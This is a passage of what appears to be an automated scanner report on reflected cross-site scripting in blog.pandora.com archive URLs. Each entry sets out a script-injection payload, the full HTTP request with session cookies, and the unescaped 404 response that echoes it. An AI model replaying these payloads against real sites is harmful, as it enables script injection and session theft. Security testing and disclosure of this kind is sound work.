<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
